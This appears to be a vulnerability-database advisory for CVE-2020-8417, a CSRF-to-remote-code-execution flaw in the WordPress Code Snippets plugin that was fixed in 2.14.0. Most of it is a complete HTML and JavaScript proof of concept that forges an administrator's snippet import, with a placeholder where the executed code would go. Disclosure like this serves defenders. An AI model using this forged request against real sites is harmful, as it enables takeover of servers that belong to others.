Code Snippets < 2.14.0 - CSRF to RCE



Description
This "flaw allowed anybody to forge a request on behalf of an administrator and inject executable code on a vulnerable site."
Proof of Concept
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/waftesting.vhx.cloud:8080\/wp-admin\/admin.php?page=import-snippets", true);
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryIpMt0484nyfHOSdA");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"duplicate_action\"\r\n" + 
          "\r\n" + 
          "ignore\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"code_snippets_import_files[]\"; filename=\"code-snippets (2).json\"\r\n" + 
          "Content-Type: application/json\r\n" + 
          "\r\n" + 
          "{\"generator\":\"Code Snippets v2.13.3\",\"date_created\":\"2020-01-23 15:07\",\"snippets\":[{\"name\":\"PoC\",\"scope\":\"global\",\"code\":\"MALICIOUS CODE HERE",\"priority\":\"1\",\"active\":\"1\"}]}\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "save\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"max_file_size\"\r\n" + 
          "\r\n" + 
          "2097152\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload files and import\r\n" + 
          "------WebKitFormBoundaryIpMt0484nyfHOSdA--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 2.14.0

References

CVE 2020-8417
URL https://www.wordfence.com/blog/2020/01/high-severity-csrf-to-rce-vulnerability-patched-in-code-snippets-plugin/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://wordfence.com
Submitter Twitter infosecchloe
Views 5530
Verified No
WPVDB ID 10050

Timeline

Publicly Published 2020-01-29 (4 months ago)
Added 2020-01-29 (4 months ago)
Last Updated 2020-01-30 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin